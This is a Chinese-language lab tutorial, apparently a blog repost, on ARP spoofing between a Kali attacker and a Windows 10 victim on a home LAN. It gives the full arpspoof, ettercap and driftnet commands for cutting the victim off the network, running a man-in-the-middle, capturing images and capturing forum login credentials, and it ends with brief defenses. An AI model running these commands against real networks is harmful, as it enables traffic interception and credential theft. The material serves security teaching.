局域网安全之ARP攻击

局域网安全之ARP攻击

参考文章:

ARP原理

ARP原理和ARP攻击

实验环境

攻击方:kali 192.168.31.250

受害方:win10 192.168.31.212

准备

主机互ping

kali ping win10 win10 ping kali
局域网安全之ARP攻击_第1张图片 局域网安全之ARP攻击_第2张图片

arp -a 查看缓存表信息

kali win10
image-20210209142612920 局域网安全之ARP攻击_第3张图片

1、断网攻击

攻击流程

方法一:arpspoof

nmap -sP 192.168.31.*

ping扫描整个网段的主机

局域网安全之ARP攻击_第4张图片

发现win10主机

开始攻击:

arpspoof -i eth0 -t 192.168.31.212 192.168.31.1

局域网安全之ARP攻击_第5张图片

发现win10已无法上网

局域网安全之ARP攻击_第6张图片

在win10中查看arp缓存表

局域网安全之ARP攻击_第7张图片

在kali中Ctrl+C停止攻击,发现win10恢复上网

方法二:使用工具ettercap

ettercap -G 图形化操作

局域网安全之ARP攻击_第8张图片

局域网安全之ARP攻击_第9张图片

网关地址添加到Target1 win10地址添加到Target2
局域网安全之ARP攻击_第10张图片 局域网安全之ARP攻击_第11张图片

局域网安全之ARP攻击_第12张图片

局域网安全之ARP攻击_第13张图片

点击OK开始攻击。

查看win10的arp缓存表

局域网安全之ARP攻击_第14张图片

win10的arp缓存表中,网关的MAC地址已被改为kali的,实现中间人攻击。

2、监听图片浏览

攻击流程

在kali开启端口转发功能

cat /proc/sys/net/ipv4/ip_forward

echo 1 > /proc/sys/net/ipv4/ip_forward

//将参数改为1,开启端口转发功能(效果暂时)

局域网安全之ARP攻击_第15张图片

或者修改配置文件(效果永久)

vim /etc/sysctl.conf

局域网安全之ARP攻击_第16张图片

开始攻击:

arpspoof -i eth0 -t 192.168.31.212 192.168.31.1

局域网安全之ARP攻击_第17张图片

driftnet -i eth0 开始捕获图片

局域网安全之ARP攻击_第18张图片

win10 kali捕获
局域网安全之ARP攻击_第19张图片 局域网安全之ARP攻击_第20张图片
  • 使用工具ettercap也可以,大同小异不再赘述

ettercap -i eth0 -Tq -M arp:remote //192.168.31.212// //192.168.31.1//

-i 指定网卡

-Tq 文本模式,安静模式

-M 中间人攻击

局域网安全之ARP攻击_第21张图片

3、账号密码的获取

一定要开启端口转发,开启方法上例中有提到。

攻击流程:

使用arpspoof开始arp欺骗

局域网安全之ARP攻击_第22张图片

使用ettercap工具捕获账号密码

局域网安全之ARP攻击_第23张图片

win10模拟用户登录某论坛

局域网安全之ARP攻击_第24张图片

回到kali查看结果

局域网安全之ARP攻击_第25张图片

如图已捕获到登录的账号和密码的md5值。

可能是网站有安全设置,试了好几家如百度、京东、搜狐都没捕获成功,最后在某家论坛上实验成功了,为了激动的那一刻不容易啊,哈哈哈。

防御措施

1、使用安全软件(局域网防护,自动绑定网关)

2、手动静态绑定网关的ip与MAC地址

arp -s IP MAC

3、路由器上设置IP与MAC地址绑定

你可能感兴趣的:(kali,安全,网络,mac)